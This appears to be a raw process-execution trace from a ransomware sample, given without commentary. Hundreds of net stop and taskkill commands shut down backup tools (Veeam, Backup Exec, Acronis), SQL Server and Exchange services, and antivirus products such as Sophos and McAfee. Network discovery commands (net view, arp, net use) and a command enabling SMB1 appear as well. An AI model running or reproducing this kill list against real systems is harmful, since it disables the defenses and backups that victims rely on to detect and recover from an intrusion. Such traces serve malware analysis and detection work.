C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
C:\Windows\SysWOW64\net.exe
net view
C:\Windows\SysWOW64\arp.exe
"arp" -a
C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
